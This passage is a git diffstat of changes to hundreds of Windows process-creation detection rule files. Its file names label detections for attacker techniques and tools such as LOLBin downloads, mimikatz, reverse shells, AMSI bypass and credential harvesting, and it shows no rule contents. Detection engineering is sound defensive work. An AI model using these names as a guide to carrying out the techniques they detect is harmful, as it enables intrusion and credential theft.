..._creation_win_agentexecutor_susp_usage.yml | 27 +- ...tion_win_appvlp_uncommon_child_process.yml | 31 +- ...creation_win_aspnet_compiler_exectuion.yml | 21 +- ...win_aspnet_compiler_susp_child_process.yml | 37 +- ...reation_win_aspnet_compiler_susp_paths.yml | 24 +- ..._creation_win_at_interactive_execution.yml | 7 +- .../proc_creation_win_attrib_hiding_files.yml | 13 +- .../proc_creation_win_attrib_system.yml | 13 +- ..._creation_win_attrib_system_susp_paths.yml | 26 +- ...ion_win_auditpol_nt_resource_kit_usage.yml | 21 +- ...c_creation_win_auditpol_susp_execution.yml | 31 +- ...oc_creation_win_bash_command_execution.yml | 14 +- .../proc_creation_win_bash_file_execution.yml | 25 +- ..._creation_win_bcdedit_boot_conf_tamper.yml | 22 +- ...oc_creation_win_bcdedit_susp_execution.yml | 6 +- ...on_win_bginfo_suspicious_child_process.yml | 39 +- ...tion_win_bginfo_uncommon_child_process.yml | 7 +- .../proc_creation_win_bitsadmin_download.yml | 10 +- ...ation_win_bitsadmin_download_direct_ip.yml | 17 +- ...itsadmin_download_file_sharing_domains.yml | 10 +- ...win_bitsadmin_download_susp_extensions.yml | 8 +- ...n_bitsadmin_download_susp_targetfolder.yml | 11 +- ...tsadmin_download_uncommon_targetfolder.yml | 8 +- ...on_win_bitsadmin_potential_persistence.yml | 15 +- ...n_browsers_chromium_headless_debugging.yml | 12 +- ...on_win_browsers_chromium_headless_exec.yml | 8 +- ...owsers_chromium_headless_file_download.yml | 11 +- ...n_win_browsers_chromium_load_extension.yml | 14 +- ...on_win_browsers_chromium_mockbin_abuse.yml | 10 +- ..._browsers_chromium_susp_load_extension.yml | 11 +- ...tion_win_browsers_inline_file_download.yml | 11 +- ...creation_win_browsers_remote_debugging.yml | 14 +- ...oc_creation_win_browsers_tor_execution.yml | 2 +- .../proc_creation_win_calc_uncommon_exec.yml | 16 +- ...n_win_certmgr_certificate_installation.yml | 28 +- .../proc_creation_win_certoc_download.yml | 10 +- ...creation_win_certoc_download_direct_ip.yml | 12 +- .../proc_creation_win_certoc_load_dll.yml | 13 +- ...ion_win_certoc_load_dll_susp_locations.yml | 15 +- ..._win_certutil_certificate_installation.yml | 30 +- .../proc_creation_win_certutil_decode.yml | 12 +- .../proc_creation_win_certutil_download.yml | 18 +- ...eation_win_certutil_download_direct_ip.yml | 44 +- ...certutil_download_file_sharing_domains.yml | 21 +- .../proc_creation_win_certutil_encode.yml | 15 +- ...on_win_certutil_encode_susp_extensions.yml | 15 +- ...tion_win_certutil_encode_susp_location.yml | 16 +- .../proc_creation_win_certutil_export_pfx.yml | 15 +- ...oc_creation_win_certutil_ntlm_coercion.yml | 6 +- ...proc_creation_win_chcp_codepage_switch.yml | 18 +- ...tion_win_cipher_overwrite_deleted_data.yml | 20 +- ...ion_win_citrix_trolleyexpress_procdump.yml | 11 +- .../proc_creation_win_clip_execution.yml | 8 +- ...ion_win_cloudflared_portable_execution.yml | 10 +- ..._win_cloudflared_quicktunnel_execution.yml | 122 +- ...reation_win_cloudflared_tunnel_cleanup.yml | 7 +- ...oc_creation_win_cloudflared_tunnel_run.yml | 8 +- .../proc_creation_win_cmd_assoc_execution.yml | 23 +- ..._cmd_assoc_tamper_exe_file_association.yml | 26 +- ...c_creation_win_cmd_copy_dmp_from_share.yml | 12 +- ...ation_win_cmd_curl_download_exec_combo.yml | 7 +- .../proc_creation_win_cmd_del_execution.yml | 33 +- ...c_creation_win_cmd_del_greedy_deletion.yml | 14 +- .../proc_creation_win_cmd_dir_execution.yml | 5 +- .../proc_creation_win_cmd_dosfuscation.yml | 5 +- .../proc_creation_win_cmd_http_appdata.yml | 10 +- .../proc_creation_win_cmd_mklink_osk_cmd.yml | 11 +- ...md_mklink_shadow_copies_access_symlink.yml | 5 +- ...reation_win_cmd_net_use_and_exec_combo.yml | 12 +- ...oc_creation_win_cmd_no_space_execution.yml | 33 +- ...oc_creation_win_cmd_ntdllpipe_redirect.yml | 6 +- .../proc_creation_win_cmd_path_traversal.yml | 31 +- ...n_win_cmd_ping_copy_combined_execution.yml | 14 +- ...on_win_cmd_ping_del_combined_execution.yml | 16 +- .../proc_creation_win_cmd_redirect.yml | 18 +- ...eation_win_cmd_redirection_susp_folder.yml | 28 +- .../proc_creation_win_cmd_rmdir_execution.yml | 23 +- ...roc_creation_win_cmd_shadowcopy_access.yml | 7 +- .../proc_creation_win_cmd_stdin_redirect.yml | 10 +- ...cmd_sticky_key_like_backdoor_execution.yml | 12 +- ...c_creation_win_cmd_sticky_keys_replace.yml | 10 +- .../proc_creation_win_cmd_unusual_parent.yml | 2 +- ...eation_win_cmdkey_adding_generic_creds.yml | 9 +- .../proc_creation_win_cmdkey_recon.yml | 9 +- ...eation_win_cmstp_execution_by_creation.yml | 4 +- ...roc_creation_win_conhost_legacy_option.yml | 6 +- ...reation_win_conhost_susp_child_process.yml | 14 +- ...c_creation_win_conhost_uncommon_parent.yml | 13 +- .../proc_creation_win_control_panel_item.yml | 15 +- ...eation_win_createdump_lolbin_execution.yml | 14 +- ...ation_win_csc_susp_dynamic_compilation.yml | 51 +- .../proc_creation_win_csc_susp_parent.yml | 60 +- .../proc_creation_win_csi_execution.yml | 18 +- .../proc_creation_win_csvde_export.yml | 11 +- ...roc_creation_win_curl_cookie_hijacking.yml | 11 +- ...oc_creation_win_curl_custom_user_agent.yml | 12 +- ...ation_win_curl_download_direct_ip_exec.yml | 19 +- ...url_download_direct_ip_susp_extensions.yml | 18 +- ...url_download_susp_file_sharing_domains.yml | 19 +- ..._creation_win_curl_insecure_connection.yml | 8 +- ...reation_win_curl_insecure_porxy_or_doh.yml | 9 +- ...proc_creation_win_curl_local_file_read.yml | 9 +- .../proc_creation_win_curl_susp_download.yml | 28 +- ...desktopimgdownldr_remote_file_download.yml | 8 +- ...n_win_desktopimgdownldr_susp_execution.yml | 12 +- ...ion_win_deviceenroller_dll_sideloading.yml | 20 +- ...proc_creation_win_devinit_lolbin_usage.yml | 6 +- ...n_win_dfsvc_suspicious_child_processes.yml | 6 +- .../proc_creation_win_dirlister_execution.yml | 8 +- ...tion_win_diskshadow_child_process_susp.yml | 26 +- ...on_win_diskshadow_script_mode_susp_ext.yml | 36 +- ...n_diskshadow_script_mode_susp_location.yml | 31 +- ..._creation_win_dll_sideload_vmware_xfer.yml | 9 +- ..._creation_win_dllhost_no_cli_execution.yml | 10 +- ...n_win_dns_exfiltration_tools_execution.yml | 4 +- ...oc_creation_win_dns_susp_child_process.yml | 6 +- .../proc_creation_win_dnscmd_discovery.yml | 7 +- ...md_install_new_server_level_plugin_dll.yml | 16 +- ...tion_win_dotnet_trace_lolbin_execution.yml | 6 +- .../proc_creation_win_driverquery_recon.yml | 31 +- .../proc_creation_win_driverquery_usage.yml | 35 +- ..._creation_win_dsacls_abuse_permissions.yml | 8 +- ...roc_creation_win_dsacls_password_spray.yml | 6 +- .../proc_creation_win_dsim_remove.yml | 17 +- ...ion_win_dsquery_domain_trust_discovery.yml | 14 +- .../proc_creation_win_dtrace_kernel_dump.yml | 9 +- ...oc_creation_win_dumpminitool_execution.yml | 21 +- ...eation_win_dumpminitool_susp_execution.yml | 29 +- .../proc_creation_win_esentutl_params.yml | 6 +- ...ation_win_esentutl_sensitive_file_copy.yml | 16 +- .../proc_creation_win_esentutl_webcache.yml | 11 +- ...eation_win_eventvwr_susp_child_process.yml | 9 +- ...ltration_and_tunneling_tools_execution.yml | 2 +- ...proc_creation_win_expand_cabinet_files.yml | 33 +- ...eation_win_explorer_break_process_tree.yml | 24 +- ...creation_win_explorer_lolbin_execution.yml | 4 +- .../proc_creation_win_explorer_nouaccheck.yml | 12 +- .../proc_creation_win_findstr_download.yml | 26 +- ...roc_creation_win_findstr_gpp_passwords.yml | 17 +- .../proc_creation_win_findstr_lnk.yml | 17 +- .../proc_creation_win_findstr_lsass.yml | 19 +- ...oc_creation_win_findstr_recon_everyone.yml | 28 +- ...creation_win_findstr_recon_pipe_output.yml | 15 +- ...on_win_findstr_security_keyword_lookup.yml | 31 +- ..._creation_win_findstr_subfolder_search.yml | 25 +- ..._sysmon_discovery_via_default_altitude.yml | 18 +- .../proc_creation_win_finger_usage.yml | 7 +- .../proc_creation_win_fltmc_unload_driver.yml | 13 +- ...reation_win_fltmc_unload_driver_sysmon.yml | 10 +- ...in_forfiles_child_process_masquerading.yml | 18 +- ...creation_win_forfiles_proxy_execution_.yml | 27 +- ..._creation_win_fsutil_drive_enumeration.yml | 6 +- ..._creation_win_fsutil_symlinkevaluation.yml | 16 +- .../proc_creation_win_fsutil_usage.yml | 19 +- ...ownloadwrapper_arbitrary_file_download.yml | 9 +- .../proc_creation_win_git_susp_clone.yml | 17 +- ...on_win_googleupdate_susp_child_process.yml | 17 +- .../proc_creation_win_gpg4win_decryption.yml | 10 +- .../proc_creation_win_gpg4win_encryption.yml | 10 +- ...reation_win_gpg4win_portable_execution.yml | 15 +- ...roc_creation_win_gpg4win_susp_location.yml | 17 +- .../proc_creation_win_gpresult_execution.yml | 7 +- ...ion_win_gup_arbitrary_binary_execution.yml | 11 +- .../proc_creation_win_gup_download.yml | 12 +- ..._creation_win_gup_suspicious_execution.yml | 11 +- .../proc_creation_win_hh_chm_execution.yml | 6 +- ...in_hh_chm_remote_download_or_execution.yml | 9 +- ...on_win_hh_html_help_susp_child_process.yml | 2 +- .../proc_creation_win_hh_susp_execution.yml | 11 +- .../proc_creation_win_hktl_adcspwn.yml | 6 +- ...reation_win_hktl_bloodhound_sharphound.yml | 25 +- ..._creation_win_hktl_c3_rundll32_pattern.yml | 2 +- .../proc_creation_win_hktl_certify.yml | 13 +- .../proc_creation_win_hktl_certipy.yml | 13 +- ...ion_win_hktl_cobaltstrike_bloopers_cmd.yml | 15 +- ...win_hktl_cobaltstrike_bloopers_modules.yml | 10 +- ...win_hktl_cobaltstrike_load_by_rundll32.yml | 17 +- ...win_hktl_cobaltstrike_process_patterns.yml | 8 +- .../proc_creation_win_hktl_coercedpotato.yml | 20 +- .../proc_creation_win_hktl_covenant.yml | 6 +- ...eation_win_hktl_crackmapexec_execution.yml | 23 +- ...n_hktl_crackmapexec_execution_patterns.yml | 7 +- ...reation_win_hktl_crackmapexec_patterns.yml | 13 +- ...tl_crackmapexec_powershell_obfuscation.yml | 20 +- .../proc_creation_win_hktl_createminidump.yml | 9 +- .../proc_creation_win_hktl_dinjector.yml | 7 +- .../proc_creation_win_hktl_edrsilencer.yml | 13 +- ...tion_win_hktl_empire_powershell_launch.yml | 2 +- ..._win_hktl_empire_powershell_uac_bypass.yml | 2 +- .../proc_creation_win_hktl_evil_winrm.yml | 8 +- ...ation_win_hktl_execution_via_imphashes.yml | 355 +- .../proc_creation_win_hktl_gmer.yml | 8 +- .../proc_creation_win_hktl_handlekatz.yml | 23 +- .../proc_creation_win_hktl_hashcat.yml | 7 +- ...c_creation_win_hktl_htran_or_natbypass.yml | 7 +- .../proc_creation_win_hktl_hydra.yml | 7 +- ...ion_win_hktl_impacket_lateral_movement.yml | 38 +- .../proc_creation_win_hktl_impacket_tools.yml | 92 +- .../proc_creation_win_hktl_impersonate.yml | 13 +- .../proc_creation_win_hktl_inveigh.yml | 25 +- ...ation_win_hktl_invoke_obfuscation_clip.yml | 9 +- ...obfuscation_obfuscated_iex_commandline.yml | 17 +- ...tion_win_hktl_invoke_obfuscation_stdin.yml | 17 +- ...eation_win_hktl_invoke_obfuscation_var.yml | 9 +- ...n_hktl_invoke_obfuscation_via_compress.yml | 6 +- ..._win_hktl_invoke_obfuscation_via_stdin.yml | 7 +- ...n_hktl_invoke_obfuscation_via_use_clip.yml | 9 +- ..._hktl_invoke_obfuscation_via_use_mhsta.yml | 4 +- ...on_win_hktl_invoke_obfuscation_via_var.yml | 9 +- ...eation_win_hktl_jlaive_batch_execution.yml | 12 +- .../proc_creation_win_hktl_koadic.yml | 6 +- .../proc_creation_win_hktl_krbrelay.yml | 10 +- .../proc_creation_win_hktl_krbrelayup.yml | 13 +- .../proc_creation_win_hktl_localpotato.yml | 7 +- ...reation_win_hktl_meterpreter_getsystem.yml | 19 +- ...reation_win_hktl_mimikatz_command_line.yml | 33 +- .../proc_creation_win_hktl_pchunter.yml | 33 +- ...tl_powersploit_empire_default_schtasks.yml | 6 +- .../proc_creation_win_hktl_powertool.yml | 12 +- ...eation_win_hktl_purplesharp_indicators.yml | 6 +- .../proc_creation_win_hktl_pypykatz.yml | 8 +- .../proc_creation_win_hktl_quarks_pwdump.yml | 4 +- ...on_win_hktl_redmimicry_winnti_playbook.yml | 7 +- ..._creation_win_hktl_relay_attacks_tools.yml | 21 +- .../proc_creation_win_hktl_rubeus.yml | 45 +- .../proc_creation_win_hktl_safetykatz.yml | 9 +- .../proc_creation_win_hktl_secutyxploded.yml | 6 +- .../proc_creation_win_hktl_selectmyparent.yml | 61 +- .../proc_creation_win_hktl_sharp_chisel.yml | 9 +- ..._creation_win_hktl_sharp_impersonation.yml | 29 +- ...c_creation_win_hktl_sharp_ldap_monitor.yml | 9 +- .../proc_creation_win_hktl_sharpersist.yml | 15 +- .../proc_creation_win_hktl_sharpevtmute.yml | 17 +- ...proc_creation_win_hktl_sharpldapwhoami.yml | 13 +- .../proc_creation_win_hktl_sharpup.yml | 20 +- .../proc_creation_win_hktl_sharpview.yml | 203 +- ...n_win_hktl_sliver_c2_execution_pattern.yml | 5 +- ...ation_win_hktl_stracciatella_execution.yml | 23 +- .../proc_creation_win_hktl_sysmoneop.yml | 14 +- .../proc_creation_win_hktl_trufflesnout.yml | 7 +- .../proc_creation_win_hktl_uacme.yml | 31 +- .../proc_creation_win_hktl_wce.yml | 16 +- .../proc_creation_win_hktl_winpeas.yml | 43 +- .../proc_creation_win_hktl_winpwn.yml | 12 +- ...on_win_hktl_wmiexec_default_powershell.yml | 5 +- .../proc_creation_win_hktl_xordump.yml | 12 +- .../proc_creation_win_hktl_zipexec.yml | 7 +- .../proc_creation_win_hostname_execution.yml | 2 +- .../proc_creation_win_hwp_exploits.yml | 5 +- .../proc_creation_win_icacls_deny.yml | 11 +- .../proc_creation_win_ieexec_download.yml | 6 +- ...c_creation_win_iis_appcmd_http_logging.yml | 9 +- ...appcmd_service_account_password_dumped.yml | 24 +- ...ion_win_iis_appcmd_susp_module_install.yml | 11 +- ...ation_win_iis_appcmd_susp_rewrite_rule.yml | 10 +- ..._win_iis_connection_strings_decryption.yml | 11 +- ...ation_win_iis_susp_module_registration.yml | 11 +- ...ion_win_imagingdevices_unusual_parents.yml | 7 +- .../proc_creation_win_imewbdld_download.yml | 11 +- ..._infdefaultinstall_execute_sct_scripts.yml | 5 +- ...proc_creation_win_installutil_download.yml | 12 +- ...eation_win_instalutil_no_log_execution.yml | 9 +- ...on_win_java_keytool_susp_child_process.yml | 5 +- ...n_java_manageengine_susp_child_process.yml | 17 +- ...roc_creation_win_java_remote_debugging.yml | 9 +- ...c_creation_win_java_susp_child_process.yml | 11 +- ...creation_win_java_susp_child_process_2.yml | 11 +- .../proc_creation_win_kd_execution.yml | 7 +- ...on_win_ksetup_password_change_computer.yml | 9 +- ...eation_win_ksetup_password_change_user.yml | 6 +- .../proc_creation_win_ldifde_export.yml | 11 +- .../proc_creation_win_ldifde_file_load.yml | 13 +- ...n_lodctr_performance_counter_tampering.yml | 9 +- ...c_creation_win_logman_disable_eventlog.yml | 13 +- .../proc_creation_win_lolbin_cdb.yml | 11 +- ...creation_win_lolbin_class_exec_xwizard.yml | 9 +- .../proc_creation_win_lolbin_cmdl32.yml | 6 +- ...eation_win_lolbin_configsecuritypolicy.yml | 11 +- ...oc_creation_win_lolbin_customshellhost.yml | 5 +- ...data_exfiltration_by_using_datasvcutil.yml | 13 +- ...eation_win_lolbin_dctask64_proc_inject.yml | 4 +- .../proc_creation_win_lolbin_defaultpack.yml | 3 +- ...in_lolbin_device_credential_deployment.yml | 5 +- ...c_creation_win_lolbin_devtoolslauncher.yml | 4 +- .../proc_creation_win_lolbin_diantz_ads.yml | 7 +- ..._creation_win_lolbin_diantz_remote_cab.yml | 5 +- ...eation_win_lolbin_dll_sideload_xwizard.yml | 7 +- .../proc_creation_win_lolbin_dnx.yml | 2 +- .../proc_creation_win_lolbin_dotnet.yml | 6 +- .../proc_creation_win_lolbin_dotnet_dump.yml | 13 +- .../proc_creation_win_lolbin_dump64.yml | 12 +- .../proc_creation_win_lolbin_extexport.yml | 9 +- .../proc_creation_win_lolbin_extrac32.yml | 10 +- .../proc_creation_win_lolbin_extrac32_ads.yml | 4 +- .../proc_creation_win_lolbin_format.yml | 10 +- ...reation_win_lolbin_fsharp_interpreters.yml | 11 +- .../proc_creation_win_lolbin_ftp.yml | 9 +- ...reation_win_lolbin_gather_network_info.yml | 25 +- .../proc_creation_win_lolbin_gpscript.yml | 9 +- .../proc_creation_win_lolbin_ie4uinit.yml | 12 +- .../proc_creation_win_lolbin_ilasm.yml | 4 +- .../proc_creation_win_lolbin_jsc.yml | 7 +- .../proc_creation_win_lolbin_kavremover.yml | 10 +- ..._creation_win_lolbin_launch_vsdevshell.yml | 7 +- .../proc_creation_win_lolbin_manage_bde.yml | 14 +- ...win_lolbin_mavinject_process_injection.yml | 11 +- .../proc_creation_win_lolbin_mpiexec.yml | 11 +- .../proc_creation_win_lolbin_msdeploy.yml | 4 +- ...c_creation_win_lolbin_msdt_answer_file.yml | 10 +- .../proc_creation_win_lolbin_openconsole.yml | 9 +- .../proc_creation_win_lolbin_openwith.yml | 4 +- .../proc_creation_win_lolbin_pcalua.yml | 15 +- .../proc_creation_win_lolbin_pcwrun.yml | 6 +- ...roc_creation_win_lolbin_pcwrun_follina.yml | 7 +- .../proc_creation_win_lolbin_pcwutl.yml | 9 +- .../proc_creation_win_lolbin_pester.yml | 7 +- .../proc_creation_win_lolbin_pester_1.yml | 13 +- .../proc_creation_win_lolbin_printbrm.yml | 7 +- .../proc_creation_win_lolbin_pubprn.yml | 5 +- ...tion_win_lolbin_rasautou_dll_execution.yml | 14 +- .../proc_creation_win_lolbin_register_app.yml | 8 +- .../proc_creation_win_lolbin_remote.yml | 7 +- .../proc_creation_win_lolbin_replace.yml | 7 +- .../proc_creation_win_lolbin_runexehelper.yml | 3 +- ...oc_creation_win_lolbin_runscripthelper.yml | 4 +- .../proc_creation_win_lolbin_scriptrunner.yml | 9 +- .../proc_creation_win_lolbin_setres.yml | 6 +- .../proc_creation_win_lolbin_sftp.yml | 10 +- ...eation_win_lolbin_sideload_link_binary.yml | 9 +- .../proc_creation_win_lolbin_sigverif.yml | 3 +- .../proc_creation_win_lolbin_ssh.yml | 11 +- ...eation_win_lolbin_susp_acccheckconsole.yml | 9 +- ...proc_creation_win_lolbin_susp_atbroker.yml | 6 +- ...ation_win_lolbin_susp_certreq_download.yml | 9 +- ...olbin_susp_driver_installed_by_pnputil.yml | 13 +- .../proc_creation_win_lolbin_susp_dxcap.yml | 6 +- .../proc_creation_win_lolbin_susp_grpconv.yml | 5 +- ...ion_win_lolbin_susp_sqldumper_activity.yml | 4 +- ...n_syncappvpublishingserver_execute_psh.yml | 10 +- ...ncappvpublishingserver_vbs_execute_psh.yml | 4 +- .../proc_creation_win_lolbin_tracker.yml | 12 +- .../proc_creation_win_lolbin_ttdinject.yml | 7 +- ..._creation_win_lolbin_tttracer_mod_load.yml | 9 +- .../proc_creation_win_lolbin_type.yml | 10 +- .../proc_creation_win_lolbin_unregmp2.yml | 9 +- ...c_creation_win_lolbin_utilityfunctions.yml | 5 +- ...ation_win_lolbin_visual_basic_compiler.yml | 7 +- ...ation_win_lolbin_visualuiaverifynative.yml | 7 +- ...c_creation_win_lolbin_vsiisexelauncher.yml | 9 +- .../proc_creation_win_lolbin_wfc.yml | 7 +- .../proc_creation_win_lolbin_wlrmdr.yml | 12 +- ..._creation_win_lolbin_workflow_compiler.yml | 7 +- ...oc_creation_win_lolscript_register_app.yml | 19 +- .../proc_creation_win_lsass_process_clone.yml | 5 +- ..._creation_win_malware_conti_shadowcopy.yml | 9 +- ...oc_creation_win_malware_script_dropper.yml | 6 +- ...roc_creation_win_mftrace_child_process.yml | 3 +- ...reation_win_mmc_mmc20_lateral_movement.yml | 8 +- ...oc_creation_win_mmc_susp_child_process.yml | 22 +- .../proc_creation_win_mofcomp_execution.yml | 55 +- ...ion_win_mpcmdrun_dll_sideload_defender.yml | 11 +- ...n_win_mpcmdrun_download_arbitrary_file.yml | 10 +- ...run_remove_windows_defender_definition.yml | 9 +- ...eation_win_msbuild_susp_parent_process.yml | 4 +- ...n_win_msdt_arbitrary_command_execution.yml | 16 +- ...roc_creation_win_msdt_susp_cab_options.yml | 13 +- .../proc_creation_win_msdt_susp_parent.yml | 8 +- ...roc_creation_win_msedge_proxy_download.yml | 6 +- .../proc_creation_win_mshta_http.yml | 10 +- ...roc_creation_win_mshta_inline_vbscript.yml | 8 +- .../proc_creation_win_mshta_javascript.yml | 6 +- ...creation_win_mshta_lethalhta_technique.yml | 5 +- ...reation_win_mshta_susp_child_processes.yml | 45 +- ...proc_creation_win_mshta_susp_execution.yml | 12 +- .../proc_creation_win_mshta_susp_pattern.yml | 32 +- .../proc_creation_win_msiexec_dll.yml | 8 +- .../proc_creation_win_msiexec_embedding.yml | 17 +- .../proc_creation_win_msiexec_execute_dll.yml | 19 +- ...roc_creation_win_msiexec_install_quiet.yml | 20 +- ...oc_creation_win_msiexec_install_remote.yml | 16 +- ...proc_creation_win_msiexec_masquerading.yml | 6 +- .../proc_creation_win_msiexec_web_install.yml | 9 +- .../proc_creation_win_msohtmed_download.yml | 6 +- .../proc_creation_win_mspub_download.yml | 9 +- ...reation_win_mssql_sqlps_susp_execution.yml | 21 +- ...on_win_mssql_sqltoolsps_susp_execution.yml | 20 +- ..._creation_win_mssql_susp_child_process.yml | 14 +- ...n_win_mssql_veaam_susp_child_processes.yml | 13 +- ...reation_win_mstsc_rdp_hijack_shadowing.yml | 2 +- ...c_creation_win_mstsc_remote_connection.yml | 19 +- ..._creation_win_mstsc_run_local_rdp_file.yml | 8 +- ...mstsc_run_local_rdp_file_susp_location.yml | 15 +- ...n_mstsc_run_local_rpd_file_susp_parent.yml | 9 +- .../proc_creation_win_msxsl_execution.yml | 14 +- ...oc_creation_win_msxsl_remote_execution.yml | 7 +- ..._win_net_default_accounts_manipulation.yml | 78 +- ...tion_win_net_groups_and_accounts_recon.yml | 48 +- ..._win_net_network_connections_discovery.yml | 28 +- ...eation_win_net_share_and_sessions_enum.yml | 19 +- .../proc_creation_win_net_share_unmount.yml | 18 +- .../proc_creation_win_net_start_service.yml | 17 +- .../proc_creation_win_net_stop_service.yml | 21 +- .../proc_creation_win_net_susp_execution.yml | 20 +- ...creation_win_net_use_mount_admin_share.yml | 21 +- ...ation_win_net_use_mount_internet_share.yml | 17 +- .../proc_creation_win_net_use_mount_share.yml | 18 +- ...reation_win_net_use_password_plaintext.yml | 16 +- .../proc_creation_win_net_user_add.yml | 18 +- ...creation_win_net_user_add_never_expire.yml | 21 +- .../proc_creation_win_netsh_fw_add_rule.yml | 14 +- ...etsh_fw_allow_program_in_susp_location.yml | 31 +- .../proc_creation_win_netsh_fw_allow_rdp.yml | 14 +- ...proc_creation_win_netsh_fw_delete_rule.yml | 11 +- .../proc_creation_win_netsh_fw_disable.yml | 12 +- ...reation_win_netsh_fw_enable_group_rule.yml | 9 +- ..._creation_win_netsh_fw_rules_discovery.yml | 11 +- .../proc_creation_win_netsh_fw_set_rule.yml | 11 +- ...ation_win_netsh_helper_dll_persistence.yml | 21 +- ...proc_creation_win_netsh_packet_capture.yml | 9 +- ...roc_creation_win_netsh_port_forwarding.yml | 25 +- ...reation_win_netsh_port_forwarding_3389.yml | 9 +- ...n_win_netsh_wifi_credential_harvesting.yml | 6 +- .../proc_creation_win_nltest_execution.yml | 12 +- .../proc_creation_win_nltest_recon.yml | 40 +- .../proc_creation_win_node_abuse.yml | 11 +- ...on_win_node_adobe_creative_cloud_abuse.yml | 7 +- ...creation_win_nslookup_domain_discovery.yml | 8 +- ...eation_win_nslookup_poweshell_download.yml | 17 +- .../proc_creation_win_ntdsutil_susp_usage.yml | 28 +- .../proc_creation_win_ntdsutil_usage.yml | 5 +- ...c_creation_win_odbcconf_driver_install.yml | 18 +- ...ation_win_odbcconf_driver_install_susp.yml | 17 +- ...ation_win_odbcconf_exec_susp_locations.yml | 10 +- ...ation_win_odbcconf_register_dll_regsvr.yml | 22 +- ..._win_odbcconf_register_dll_regsvr_susp.yml | 17 +- ...oc_creation_win_odbcconf_response_file.yml | 27 +- ...eation_win_odbcconf_response_file_susp.yml | 24 +- ...on_win_odbcconf_uncommon_child_process.yml | 7 +- ...tion_win_office_arbitrary_cli_download.yml | 22 +- ...win_office_excel_dcom_lateral_movement.yml | 22 +- ...win_office_exec_from_trusted_locations.yml | 27 +- ...in_office_onenote_susp_child_processes.yml | 170 +- ...utlook_enable_unsafe_client_mail_rules.yml | 9 +- ...win_office_outlook_execution_from_temp.yml | 2 +- ...in_office_outlook_susp_child_processes.yml | 34 +- ...ce_outlook_susp_child_processes_remote.yml | 9 +- ..._office_spawn_exe_from_users_directory.yml | 10 +- ...eation_win_office_susp_child_processes.yml | 170 +- ...c_creation_win_office_winword_dll_load.yml | 13 +- ...flinescannershell_mpclient_sideloading.yml | 16 +- ...ion_win_pdqdeploy_runner_susp_children.yml | 68 +- ...tion_win_perl_inline_command_execution.yml | 9 +- ...ation_win_php_inline_command_execution.yml | 9 +- .../proc_creation_win_ping_hex_ip.yml | 4 +- .../proc_creation_win_pktmon_execution.yml | 4 +- ...proc_creation_win_plink_susp_tunneling.yml | 14 +- .../proc_creation_win_powercfg_execution.yml | 26 +- ...ershell_aadinternals_cmdlets_execution.yml | 23 +- ...ell_active_directory_module_dll_import.yml | 27 +- ..._win_powershell_add_windows_capability.yml | 26 +- ...win_powershell_amsi_init_failed_bypass.yml | 11 +- ...n_win_powershell_amsi_null_bits_bypass.yml | 9 +- ..._creation_win_powershell_audio_capture.yml | 5 +- ...tion_win_powershell_base64_encoded_cmd.yml | 31 +- ...win_powershell_base64_frombase64string.yml | 14 +- ...roc_creation_win_powershell_base64_iex.yml | 49 +- ..._creation_win_powershell_base64_invoke.yml | 23 +- ...ion_win_powershell_base64_mppreference.yml | 40 +- ...rshell_base64_reflection_assembly_load.yml | 10 +- ...base64_reflection_assembly_load_obfusc.yml | 15 +- ...tion_win_powershell_base64_wmi_classes.yml | 34 +- ..._creation_win_powershell_cl_invocation.yml | 6 +- ...reation_win_powershell_cl_loadassembly.yml | 7 +- ...ation_win_powershell_cl_mutexverifiers.yml | 14 +- ...ershell_cmdline_convertto_securestring.yml | 17 +- ...in_powershell_cmdline_reversed_strings.yml | 24 +- ..._powershell_cmdline_special_characters.yml | 29 +- ...hell_computer_discovery_get_adcomputer.yml | 26 +- ...creation_win_powershell_create_service.yml | 6 +- ...oc_creation_win_powershell_decode_gzip.yml | 6 +- ...reation_win_powershell_decrypt_pattern.yml | 29 +- ...in_powershell_defender_disable_feature.yml | 14 +- ...tion_win_powershell_defender_exclusion.yml | 11 +- ...isable_defender_av_security_monitoring.yml | 31 +- ...eation_win_powershell_disable_firewall.yml | 22 +- ...ion_win_powershell_disable_ie_features.yml | 9 +- ..._creation_win_powershell_dll_execution.yml | 25 +- ...eation_win_powershell_downgrade_attack.yml | 11 +- ...on_win_powershell_download_com_cradles.yml | 11 +- ...eation_win_powershell_download_cradles.yml | 2 +- ...c_creation_win_powershell_download_dll.yml | 7 +- ...c_creation_win_powershell_download_iex.yml | 7 +- ...ation_win_powershell_download_patterns.yml | 23 +- ...oc_creation_win_powershell_email_exfil.yml | 4 +- ...l_enable_susp_windows_optional_feature.yml | 19 +- .../proc_creation_win_powershell_encode.yml | 6 +- ...on_win_powershell_encoded_cmd_patterns.yml | 22 +- ...creation_win_powershell_encoded_obfusc.yml | 13 +- ...ation_win_powershell_encoding_patterns.yml | 30 +- ...creation_win_powershell_exec_data_file.yml | 6 +- ...tion_win_powershell_export_certificate.yml | 13 +- ...eation_win_powershell_frombase64string.yml | 5 +- ...in_powershell_frombase64string_archive.yml | 9 +- ..._creation_win_powershell_get_clipboard.yml | 6 +- ...powershell_get_localgroup_member_recon.yml | 21 +- ...eation_win_powershell_getprocess_lsass.yml | 6 +- ...creation_win_powershell_hidden_b64_cmd.yml | 19 +- ...wershell_hide_services_via_set_service.yml | 21 +- ...c_creation_win_powershell_iex_patterns.yml | 8 +- ..._powershell_import_cert_susp_locations.yml | 7 +- ...win_powershell_import_module_susp_dirs.yml | 7 +- ...ershell_install_unsigned_appx_packages.yml | 23 +- ...ion_win_powershell_invocation_specific.yml | 26 +- ...powershell_invoke_webrequest_direct_ip.yml | 21 +- ..._powershell_invoke_webrequest_download.yml | 26 +- ...ion_win_powershell_mailboxexport_share.yml | 5 +- ...ation_win_powershell_malicious_cmdlets.yml | 27 +- ..._powershell_msexchange_transport_agent.yml | 9 +- ...n_powershell_non_interactive_execution.yml | 23 +- ...on_win_powershell_obfuscation_via_utf8.yml | 2 +- ..._creation_win_powershell_public_folder.yml | 7 +- ...wershell_remotefxvgpudisablement_abuse.yml | 18 +- ...in_powershell_reverse_shell_connection.yml | 18 +- ...ion_win_powershell_run_script_from_ads.yml | 4 +- ...owershell_run_script_from_input_stream.yml | 4 +- ...roc_creation_win_powershell_sam_access.yml | 4 +- ...on_win_powershell_script_engine_parent.yml | 5 +- ..._service_dacl_modification_set_service.yml | 18 +- .../proc_creation_win_powershell_set_acl.yml | 26 +- ...n_win_powershell_set_acl_susp_location.yml | 34 +- ...ershell_set_policies_to_unsecure_level.yml | 31 +- ...on_win_powershell_set_service_disabled.yml | 11 +- ...ion_win_powershell_shadowcopy_deletion.yml | 18 +- ...reation_win_powershell_snapins_hafnium.yml | 23 